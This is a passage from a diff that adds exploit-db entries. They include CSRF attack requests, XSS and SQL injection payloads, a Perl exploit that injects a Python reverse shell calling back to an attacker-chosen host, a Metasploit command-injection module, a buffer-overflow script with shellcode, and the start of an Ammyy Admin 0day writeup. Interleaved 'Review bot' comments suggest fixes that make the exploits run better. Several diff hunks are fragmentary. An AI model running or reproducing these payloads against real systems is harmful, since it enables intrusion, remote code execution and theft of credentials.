maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
Vulnerable hooks:
profile_updatepassword_complete (Email field when you want to change
your email address after being logged in.)
register_addmember_complete (After submitting the final registration form.)
register_addmember_process
register_form_complete (This example)
register_start (Email confirmation form at register.php)

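--- a/platforms/php/webapps/34965.txt
+++ b/platforms/php/webapps/34965.txt
@@ -0,0 +1,47 @@
+# Exploit Title: RBS Change Complet Open Source multiple CSRF vulnerabilities POST and GET
+# Date: 10/10/2014
+# Exploit Author: KrustyHack
+# Vendor Homepage: http://www.rbschange.fr/
+# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html
+# Version: 3.6.8
+# Tested on: Chrome, Firefox
+DESCRIPTION
+===========
+Multiple CSRF vulnerabilities into RBS CHange Complet Open Source CMS which allow an attacker to tricks a regular logged in user by executing basket related commands like adding a product to the basket, setting a new shipping address, setting delivery mode, confirm basket and in some case confirm payment (tested with payment by check), ...
+These tricks can be done by an HTML POST form or by a simple GET request (a link that the victims click on, an image that the victims see, ...).
+HOW TO
+======
+First, the attacker need to know some paramaters as shopId, productId and other forms variables wich may differ regard to the CMS installation. It's not very difficult, he just need to register an account and look for a product then pick the differents variables by inspecting the HTML code.
+He need to look for all the checkout process urls wich can differ on all RBS Change installation (due to urls rewritting).
+In these examples we use the demo.rbschange.fr website wich is the demonstration site of the CMS.
+Text marked [VAR] need to be modified by the attacker and may need HTML code inspection.
+- Add to basket: /fr/action/order/AddToCart?quantity=1&shopId=SHOPID&productId=PRODUCTID
+- Checkout: /fr/website/Mon-panier,13494.html?orderParam[website_BlockAction_submit][cartb_9][Order]="Je commande" GET OK
+- Setting the shipping address: /fr/website/Commande-Adresse,13502.html?orderParam[billing-registered]=15&orderParam[billing-firstname]=[VICTIMFIRSTNAME]&orderParam[billing-lastname]=[VICTIMLASTNAME]&orderParam[billing-addressline1]="[VICTIMSTREET]"&orderParam[billing-zipcode]=[VICTIMZIPCODE]&orderParam[billing-city]=[VICTIMCITY]&orderParam[billing-country]=[COUNTRYCODE]&orderParam[shipping-usesameaddress]=0&orderParam[shipping-registered]=15&orderParam[shipping-firstname]=Krusty&orderParam[shipping-lastname]=Hack&orderParam[shipping-addressline1]="15, rue du oui"&orderParam[shipping-zipcode]=75000&orderParam[shipping-city]=Paris&orderParam[shipping-country]=[COUNTRYCODE]&orderParam[submited]=99k&orderParam[website_BlockAction_submit][stdAddressStepb_9][nextStep]="Continuer la commande"
+- Setting delivery mode: /fr/website/Commande-Livraison,13503.html?orderParam[shippingFilterId]=[SHIPPINGFILTERID]&orderParam[website_BlockAction_submit][stdShippingStepb_9][nextStep]="Continuer la commande"
+- Setting payment method: http://demo.rbschange.fr/fr/website/Commande-Paiement.html?orderParam[paymentFilterId]=[PAYMENTFILTERID]&orderParam[website_BlockAction_submit][stdBillingStepb_9][nextStep]="Continuer la commande"
+- Confirm payment (here it's a payment by check): http://demo.rbschange.fr/fr/action/payment/BankResponseCheque?accept=1&paymentParam%5Baccept%5D=1
+- And it's done. All the checkout process was done.
+Warning: nextStep (e.g: orderParam[website_BlockAction_submit][stdBillingStepb_9][nextStep]="Continuer la commande") variables may differ according to the language used into the website. HTML code inspection again ! :)
+WHY
+===
+All the forms doesn't use neither proper verification of HTTP request origin nor CSRF token. And all forms allow both GET and POST request.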

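--- a/platforms/php/webapps/35046.txt
+++ b/platforms/php/webapps/35046.txt
@@ -0,0 +1,57 @@
+<!--
+# Exploit Title: Axway Secure Transport 5.1 SP2 Arbitary File Upload via CSRF
+# Exploit author: Emmanuel Law
+# Public Disclosure Date : 20/10/14
+# Vendor homepage: http://www.axway.com
+# Affected Software version: Axway Secure Transport 5.2.1 SP2 and possibly earlier versions.
+# CVE: CVE-2013-7057
+Software Description:
+=====================
+Axway SecureTransport is a multi-protocol Managed File Transfer (MFT) gateway solution that enables organizations to secure, manage, and track the transfer of files inside and outside the enterprise firewall.
+Vulnerability Description:
+=====================
+It is possible to conduct CSRF on a user to upload arbitary files on the Axway Secure Transport server. This is due to the lack of anti-CSRF tokens in the web API. An adversary may exploit this to upload webshells for further attacks.
+Vulnerability Disclosure Timeline:
+==================================
+12/12/13 - Discovered vulnerability and notified Vendor
+17/10/14 - Verified with Vendor that a patch has been released.
+20/10/14 - Public disclosure
+Steps to reproduce / PoC:
+=========================
+-->
+<html>
+<!-- CSRF PoC to upload file to sftp.example.org- -->
+<body>
+<script>
+function submitRequest()
+{
+var xhr = new XMLHttpRequest();
+xhr.open("POST", "https://sftp.example.org/api/v1.0/files/", true);
+xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------19278872527677784281970288330");
+xhr.withCredentials = true;
+var body = "-----------------------------19278872527677784281970288330\r\n" +
+"Content-Disposition: form-data; name=\"upload[]\"; filename=\"AURA_TEST.randomExtension\"\r\n" +
+"Content-Type: application/octet-stream\r\n" +
+"\r\n" +
+"FILEDATA\r\n" +
+"-----------------------------19278872527677784281970288330--\r\n";
+var aBody = new Uint8Array(body.length);
+for (var i = 0; i < aBody.length; i++)
+aBody[i] = body.charCodeAt(i);
+xhr.send(new Blob([aBody]));
+}
+</script>
+<form action="#">
+<input type="button" value="Submit request" onclick="submitRequest();" />
+</form>
+</body>
+</html>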
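Review bot: The `# Exploit Title:` line names `Axway Secure Transport 5.1 SP2` while the `# Affected Software version:` line names `5.2.1 SP2 and possibly earlier versions`; the two version strings disagree and the advisory should state one affected version consistently (the hunk does not show which is correct). The comment `<!-- CSRF PoC to upload file to sftp.example.org- -->` carries a stray trailing `-` before the close, and it should also say that `sftp.example.org`, `AURA_TEST.randomExtension` and `FILEDATA` are placeholders, since the rest of the file never explains them.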


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45266/info
The Processing Embed plugin for Wordpress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WordPress Processing Embed plugin 0.5 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/wordpress-processing-embed/data/popup.php?pluginurl=%3Cscript%3Ealert(0)%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45267/info
The Safe Search plugin for Wordpress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Safe Search 0.7 is vulnerable; other versions may also be affected. 2010-12-08
http://www.example.com/wordpress/wp-content/plugins/wp-safe-search/wp-safe-search-jx.php?v1=%3Cscript%3Ealert(0)%3C/script%3E

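--- a/platforms/php/webapps/35072.txt
+++ b/platforms/php/webapps/35072.txt
@@ -0,0 +1,37 @@
+source: http://www.securityfocus.com/bid/45276/info
+The Embedded Media Field, Media: Video Flotsam, and Media: Audio Flotsam modules for Drupal are prone to multiple remote vulnerabilities, including:
+1. An HTML-injection vulnerability
+2. An arbitrary-file-upload vulnerability.
+An attacker could exploit these vulnerabilities to execute arbitrary script code in a user's browser in the context of the affected site or execute arbitrary code on the server.
+The following products and versions are affected:
+Embedded Media Field module for Drupal 6.x versions prior to 6.x-1.26 and 6.x-2.4, and for Drupal 5.x versions prior to 5.x-1.12
+Media: Video Flotsam module for Drupal 6.x versions prior to 6.x-1.2
+Media: Audio Flotsam module for Drupal 6.x versions prior to 6.x-1.1
+1. Install Drupal 6-19, CCK module, and Embedded Media Field module version 6.x-1.25
+2. Enable the Content, Embedded Media Field, Embedded Audio Field modules from ?q=/admin/build/modules
+3. Alter the default 'Story' content type at ?q=admin/content/node-type/story/fields
+4. Add a 'New Field' in the form at the bottom of this page with the label 'audio' the field name 'field_audio' the type 'Embedded Audio' and the form element '3rd Party Aduio' then click the 'Save' button
+5. Configure the new video field from ?q=admin/content/node-type/story/fields/field_video
+6. Select all content providers for convenience and click 'Save field settings' button at the bottom of the form
+7. Create a new piece of story content from ?q=node/add/story entering arbitrary values.
+8. Enter "'/><script>alert('xss');</script><embed onshow='alert("foo");'src='http://traffic.libsyn.com/pauldotcom/PaulDotCom-SW-217pt2.mp3" in the 'audio:' text field
+9. Click the 'Save' and observe the rendered JavaScript alert whenever the node is displayed
+=======================================================================================
+1. Install Drupal 6-19, CCK module, and Embedded Media Field module version 6.x-1.25
+2. Enable the Content, Embedded Media Field, Embedded Media Thumbnail and Embedded Video Field modules from ?q=/admin/build/modules
+3. Alter the default 'Story' content type at ?q=admin/content/node-type/story/fields
+4. Add a 'New Field' in the form at the bottom of this page with the label 'video' the field name 'field_video' the type 'Embedded Video' and the form element '3rd Party Video' then click the 'Save' button
+5. Configure the new video field from ?q=admin/content/node-type/story/fields/field_video
+6. Select YouTube as a content provider for convenience and be sure 'Allow custom thumbnails for this field' is checked and click 'Save field settings' button at the bottom of the form
+7. Create a new piece of story content from ?q=node/add/story entering arbitrary values. For the 'Video custom thumbnail' choose an image with
+a name like "<image src='no.jpg' onerror='alert("xss")'>.png" and click the 'Upload' button
+8. Observe the rendered javascript alert dialogue
+9. Click the 'Save' button so that the XSS persists to future node edits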

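--- a/platforms/php/webapps/35073.txt
+++ b/platforms/php/webapps/35073.txt
@@ -0,0 +1,67 @@
+######################
+# Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability
+# Exploit Author : Claudio Viviani
+# Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip
+# Date : 2014-10-23
+# Tested on : Windows 7 / Mozilla Firefox
+Windows 7 / sqlmap (0.8-1)
+Linux / Mozilla Firefox
+Linux / sqlmap 1.0-dev-5b2ded0
+######################
+# Description
+CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability
+calid variable is not sanitized.
+######################
+# PoC
+http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 [Sqli]
+# Sqlmap
+---
+Place: GET
+Parameter: calid
+Type: boolean-based blind
+Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
+Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 RLIKE (SELECT (CASE WHEN (9095=9095) THEN 1 ELSE 0x28 END))
+Type: error-based
+Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND (SELECT 3807 FROM(SELECT COUNT(*),CONCAT(0x7171736971,(SELECT (CASE WHEN (3807=3807) THEN 1 ELSE 0 END)),0x716b716671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+Type: UNION query
+Title: MySQL UNION query (NULL) - 14 columns
+Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171736971,0x6f7642724e6743615973,0x716b716671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
+Type: AND/OR time-based blind
+Title: MySQL < 5.0.12 AND time-based blind (heavy query)
+Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND 8168=BENCHMARK(5000000,MD5(0x4a4a6d41))
+---
+#####################
+Discovered By : Claudio Viviani
+http://www.homelab.it
+info@homelab.it
+homelabit@protonmail.ch
+https://www.facebook.com/homelabit
+https://twitter.com/homelabit
+https://plus.google.com/+HomelabIt1/
+https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+#####################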

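--- a/platforms/php/webapps/35080.pl
+++ b/platforms/php/webapps/35080.pl
@@ -0,0 +1,186 @@
+#!/usr/bin/perl
+#
+# Title: Incredible PBX remote command execution exploit
+# Author: Simo Ben youssef
+# Contact: Simo_at_Morxploit_com
+# Discovered: 1 September 2014
+# Coded: 21 October 2014
+# Published: 21 October 2014
+# MorXploit Research
+# http://www.MorXploit.com
+# Vendor: PBX in a Flash
+# Vendor url: http://pbxinaflash.net/
+# Software: Incredible PBX 11
+# Version: 2.0.6.5.0
+# Product url: http://incrediblepbx.com/
+# Vulnerable file: reminders/index.php
+#
+# About (from their website):
+# Incredible PBX is a secure and feature-rich implementation of the terrific Asterisk® PBX. By rethinking the PBX security model from the
+# ground up, Incredible PBX was engineered to provide rock-solid security while delivering the most comprehensive collection of Asterisk
+# utilities available on the planet including free calling in the U.S. and Canada courtesy of Google Voice.
+#
+# Description:
+# reminders/index.php which ships with Incredible PBX suffers from a command execution vulnerability, allowing an authenticated user to
+# inject commands as the asterisk user.
+#
+# Vulnerable code:
+# 484: system $retcode3 = system("sox $tmpwave -r 8000 -c 1 $newgsm");
+# 472: $tmpwave = "/tmp/$token.wav";
+# 469: $token = md5(uniqid(""));
+# 483: $newgsm = "/var/lib/asterisk/sounds/custom/" . $APPTTIME . "." . $APPTDT . "." . $APPTPHONE . ".gsm";
+# 381: $APPTTIME = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTTIME);
+# 375: $APPTTIME = $_REQUEST['APPTHR'] . $_REQUEST['APPTMIN'];
+# 380: $APPTDT = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTDT);
+# 374: $APPTDT = $_REQUEST['APPTYR'] . $_REQUEST['APPTMO'] . $_REQUEST['APPTDA'];
+# 382: $APPTPHONE = str_replace(array(chr(13), chr(10), "<", ">", " ", "(", ")", "-", "."), "", $APPTPHONE);
+# 376: $APPTPHONE = $_REQUEST['APPTPHONE'];
+#
+# As you can see, none of user input sent through $_REQUEST[] parameters is being validated/sanitized before being passed it to system();
+#
+# Exploit:
+# As PoC, the below perl code will try to exploit $_REQUEST['APPTMIN'] to inject a python connect back shell.
+#
+# Note:
+# Access to reminders/index.php requires 'maint' password, in the exploit code we have used the default installation password which is
+# 'password'.
+#
+# Demo:
+# ====================================================
+# --- Incredible PBX remote command execution exploit
+# --- By: Simo Ben youssef <simo_at_morxploit_com>
+# --- MorXploit Research www.MorXploit.com
+# ====================================================
+# [*] MorXploiting http://10.0.0.20/reminders/index.php
+# [+] Sent payload! Waiting for connect back shell ...
+# sh: no job control in this shell
+# sh-4.1$ id; cat /etc/issue
+# id; cat /etc/issue
+# uid=498(asterisk) gid=497(asterisk) groups=497(asterisk)
+# CentOS release 6.5 (Custom) on \m
+# Welcome to PBX in a Flash - Green
+# Please log in to continue
+# ******************************************
+# Your IP Address is:
+#
+# 10.0.0.20
+# ******************************************
+#
+# Download:
+# http://www.morxploit.com/morxploits/morxincpbx.pl
+#
+# Requires LWP::UserAgent
+# apt-get install libwww-perl
+# yum install libwww-perl
+# perl -MCPAN -e 'install Bundle::LWP'
+# For SSL support:
+# apt-get install liblwp-protocol-https-perl
+# yum install perl-Crypt-SSLeay
+#
+# Author disclaimer:
+# The information contained in this entire document is for educational, demonstration and testing purposes only.
+# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
+use LWP::UserAgent;
+use MIME::Base64;
+use IO::Socket;
+use strict;
+sub banner {
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+print "====================================================\n";
+print "--- Incredible PBX remote command execution exploit\n";
+print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
+print "--- MorXploit Research www.MorXploit.com\n";
+print "====================================================\n";
+}
+if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) {
+banner();
+print "perl $0 <target> <connectbackIP> <connectbackport>\n";
+print "perl $0 http://10.0.0.16 10.0.0.2 31337\n";
+exit;
+}
+my $host = $ARGV[0];
+my $vuln = "reminders/index.php";
+my $cbhost = $ARGV[1];
+my $cbport = $ARGV[2];
+my $defuser = "maint"; # Default maint user
+my $defpass = "password"; # Default maint pass
+my $string = "$defuser:$defpass";
+my $host2 = "http://localhost:81";
+my $encoded = encode_base64($string);
+$| = 1;
+$SIG{CHLD} = 'IGNORE';
+my $l_sock = IO::Socket::INET->new(
+Proto => "tcp",
+LocalPort => "$cbport",
+Listen => 1,
+LocalAddr => "0.0.0.0",
+Reuse => 1,
+) or die "[-] Could not listen on $cbport: $!\n";
+sub randomagent {
+my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
+'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
+'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
+'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
+'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
+'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
+);
+my $random = $array[rand @array];
+return($random);
+}
+my $useragent = randomagent();
+my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
+$ua->timeout(10);
+$ua->agent($useragent);
+my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded");
+unless ($status->is_success) {
+banner();
+print "[-] Error: " . $status->status_line . "\n";
+exit;
+}
+banner();
+print "[*] MorXploiting $host/$vuln\n";
+my $payload = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$cbhost\",$cbport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'";
+my $get = "APPTDA=morx&APPTPHONE=morx&APPTMO=morx&APPTMIN=;$payload;&APPTHR=morx";
+my $exploit = $ua->get("$host/$vuln?$get", Authorization => "Basic $encoded");
+print "[+] Sent payload! Waiting for connect back root shell ...\n";
+my $a_sock = $l_sock->accept();
+$l_sock->shutdown(SHUT_RDWR);
+copy_data_bidi($a_sock);
+sub copy_data_bidi {
+my ($socket) = @_;
+my $child_pid = fork();
+if (! $child_pid) {
+close(STDIN);
+copy_data_mono($socket, *STDOUT);
+$socket->shutdown(SHUT_RD);
+exit();
+} else {
+close(STDOUT);
+copy_data_mono(*STDIN, $socket);
+$socket->shutdown(SHUT_WR);
+kill("TERM", $child_pid);
+}
+}
+sub copy_data_mono {
+my ($src, $dst) = @_;
+my $buf;
+while (my $read_len = sysread($src, $buf, 4096)) {
+my $write_len = $read_len;
+while ($write_len) {
+my $written_len = syswrite($dst, $buf);
+return unless $written_len;
+$write_len -= $written_len;
+}
+}
+}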
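Review bot: The status message `print "[+] Sent payload! Waiting for connect back root shell ...\n";` contradicts the header comment, which states that commands run as the asterisk user (the Demo section's own output shows `uid=498(asterisk)` and the message `Waiting for connect back shell`), so the word "root" should be dropped to keep the advisory's privilege claim consistent. `my $host2 = "http://localhost:81";` is never read anywhere in the file and should be removed. `if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2]))` tests whether the result of a boolean expression is defined, which only rejects missing arguments by accident; `if (@ARGV < 3)` states the intent directly. In `copy_data_mono`, the retry loop resends `$buf` from offset 0 after a partial `syswrite`, so a short write duplicates data rather than continuing from where it stopped; `syswrite($dst, $buf, $write_len, $read_len - $write_len)` would resume correctly.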

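--- a/platforms/unix/remote/35078.rb
+++ b/platforms/unix/remote/35078.rb
@@ -0,0 +1,139 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::HttpClient
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Centreon SQL and Command Injection',
+'Description' => %q{
+This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
+Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command
+injection in the displayServiceStatus.php component, it is possible to execute arbitrary
+commands as long as there is a valid session registered in the centreon.session table.
+In order to have a valid session, all it takes is a successful login from anybody.
+The exploit itself does not require any authentication.
+This module has been tested successfully on Centreon Enterprise Server 2.2.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'MaZ', # Vulnerability Discovery and Analysis
+'juan vazquez' # Metasploit Module
+],
+'References' =>
+[
+['CVE', '2014-3828'],
+['CVE', '2014-3829'],
+['US-CERT-VU', '298796'],
+['URL', 'http://seclists.org/fulldisclosure/2014/Oct/78']
+],
+'Arch' => ARCH_CMD,
+'Platform' => 'unix',
+'Payload' =>
+{
+'Space' => 1500, # having into account 8192 as max URI length
+'DisableNops' => true,
+'Compat' =>
+{
+'PayloadType' => 'cmd cmd_bash',
+'RequiredCmd' => 'generic python gawk bash-tcp netcat ruby openssl'
+}
+},
+'Targets' =>
+[
+['Centreon Enterprise Server 2.2', {}]
+],
+'Privileged' => false,
+'DisclosureDate' => 'Oct 15 2014',
+'DefaultTarget' => 0))
+register_options(
+[
+OptString.new('TARGETURI', [true, 'The URI of the Centreon Application', '/centreon'])
+], self.class)
+end
+def check
+random_id = rand_text_numeric(5 + rand(8))
+res = send_session_id(random_id)
+unless res && res.code == 200 && res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
+return Exploit::CheckCode::Safe
+end
+injection = "#{random_id}' or 'a'='a"
+res = send_session_id(injection)
+if res && res.code == 200
+if res.body && res.body.to_s =~ /sh: graph: command not found/
+return Exploit::CheckCode::Vulnerable
+elsif res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
+return Exploit::CheckCode::Detected
+end
+end
+Exploit::CheckCode::Safe
+end
+def exploit
+if check == Exploit::CheckCode::Safe
+fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited")
+elsif check == Exploit::CheckCode::Detected
+fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later?")
+end
+print_status("#{peer} - Exploiting...")
+random_id = rand_text_numeric(5 + rand(8))
+random_char = rand_text_alphanumeric(1)
+session_injection = "#{random_id}' or '#{random_char}'='#{random_char}"
+template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
+res = send_template_id(session_injection, template_injection)
+if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/
+vprint_status("Output: #{res.body}")
+end
+end
+def send_session_id(session_id)
+res = send_request_cgi(
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
+'vars_get' =>
+{
+'session_id' => session_id
+}
+)
+res
+end
+def send_template_id(session_id, template_id)
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
+'vars_get' =>
+{
+'session_id' => session_id,
+'template_id' => template_id
+}
+}, 3)
+res
+end
+def mysql_payload
+p = ''
+payload.encoded.each_byte { |c| p << "#{c},"}
+p
+end
+end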
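Review bot: `exploit` calls `check` twice (`if check == Exploit::CheckCode::Safe` and then `elsif check == Exploit::CheckCode::Detected`), so both probe requests are issued a second time, and a result that changes between the two calls is not handled; capture it once with `result = check` and branch on `result`. In `check`, the guard `res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'` is redundant because a `nil` header already fails the equality; the same applies to the `elsif` branch. `send_session_id` and `send_template_id` build the identical `normalize_uri(...)` path, which is worth lifting into a small private helper so the two stay in sync, and `mysql_payload` reads more idiomatically as `payload.encoded.bytes.map { |c| "#{c}," }.join`.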


@ -0,0 +1,38 @@
#!/usr/bin/env python
# Free WMA MP3 Converter 1.8 Buffer Overflow
# Version:1.8 Build 20140226
# Author:metacom
# Date:10.23.2014
# Download:http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm
# Tested on:Win7-En 32bit - Win8.1-DE 64bit
import struct
def little_endian(address):
return struct.pack("<L",address)
poc="\x41" * 4112
eip=little_endian(0x0045CD1A)#0045CD1A FFE4 JMP ESP
nops="\x90" * 80
shellcode=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
exploit = poc + eip + nops + shellcode
try:
rst= open("bof_WMA MP3 Converter.wav",'w')
rst.write(exploit)
rst.close()
except:
print "Error"
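Review bot: The bare `except:` around the file write swallows every exception, including `KeyboardInterrupt`, and `print "Error"` discards the cause, so a permissions or path problem is indistinguishable from any other failure; `except IOError as e: print "Error: %s" % e` reports what went wrong. The open/write/close triple would also be clearer as `with open("bof_WMA MP3 Converter.wav", 'w') as rst: rst.write(exploit)`, which closes the file even when the write raises. The file header with this section's path is not visible here, so the intended filename cannot be confirmed from the page.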

View file

@ -0,0 +1,293 @@
Mirror: http://www.exploit-db.com/sploits/aa0day.zip
The Revenge of the Scammers
This exploit is an 0day in Ammyy Admin (http://www.ammyy.com/en/) a remote desktop type software that is well known for being the software that many fake tech support phone scammers used on their victims. It claims to be used by tens of millions of people. The 0-day works from the "controlled" end; when someone tries to connect to you, asking to control your computer, you send back the exploit and take over the controller. It has been written for and tested against the latest version of Ammyy Admin. (now 3.5)
This package includes two main parts: a fully commented Metasploit module, and the “aaexploit.exe” launcher. The MSF module generates a file “exploit.dat” that you will copy along with aaexploit.exe to a computer or VM to launch the exploit from. The exploit is actually launched from a DLL injected into a copy of AA, which hooks AA's data send functions, replacing them with the exploit data. This is done to avoid re-implementing AA's complex outer encryption wrapper, and allow for multiple connection types (although only one has been tested). Aaexploit.exe automates the extraction of the AA executable and dll and injection of the DLL.
This exploit has tested against many configurations, (Windows Vista and 7 32 and 64 bit) but so far it has been tested only on isolated networks. One of the ways AA can connect is via a relay in the cloud run by Ammyy. Via reverse-engineering and debugging, it is clear the same functions are reached through both methods (relay or direct), but for OPSEC reasons, I have not sent the exploit through the relays in the cloud. You can also avoid that by running your exploit from a VM directly connected to the internet, and blocking the rl.ammyy.com relay:
0. Open a windows VM you'll launch the exploit from.
1. Add the line "127.0.0.1 rl.ammyy.com" to C:\Windows\system32\drivers\etc\hosts
2. Set your VM to "bridged" and disable the firewall.
3. Forward TCP port 5931 from your router to your VM IP address.
4. When the bad guys ask for your Ammyy ID, tell them your EXTERNAL IP address. https://www.google.com/search?q=what+is+my+ip
This only allows direct connection rather than going through the Ammyy relay servers. Connections are encrypted, so you may not be concerned, but the choice is up to you.
If want to generate your own payload, drop the .rb file in your modules/exploits/windows/fileformat/ directory, start up metasploit, "use exploit/windows/fileformat/ammyy_admin_oob" and use the 3.5 direct target. Remember you have to start up a handler separately. The Always-On DEP-bypassing targets rely on loading a DLL from a UNC path, which can take a long time, depends on more things, and requires you to set up webdav and/or an SMB server somewhere manually. Also, nobody but the most paranoid security guys set the obscure Always-On DEP setting, so you really don't have to worry about it. The 3.4 targets are still in there because they were the latest until a few weeks ago, but your best bet is to stick with the latest 3.5.
Testing Instructions
1. Download Ammyy from the Ammyy website.
2. Set up two Windows VM's in an isolated network.
3. Use the Metasploit module to generate your exploit.dat file.
4. Copy the exploit.dat file and aaexploit.exe to the first VM (good guy VM) and run aaexploit.exe. After a few seconds, you will get a popup saying Ammyy isn't connected to the internet. Click to ignore it. Wait for 15 seconds to complete loading the exploit.
5. Start the Ammyy executable on the second VM (bad guy VM). After a few seconds, you will get a popup saying Ammyy isn't connected to the internet. Click to ignore it.
6. From the bad guy VM, type in the IP of the good guy VM in the “Client ID/IP” field and click Connect.
7. You will get a popup on the good guy VM asking if you want to allow the connection. Hit “allow” to send the exploit.
8. The bad guy VM should display a blank “Loading” window that will sit there as long as your shellcode is running. In this exploit, I deliberately did NOT return execution flow to the original thread, since I assumed you would not want to provide the bad guy with control over your VM.
##
# This module requires Metasploit: http//metasploit.com/download
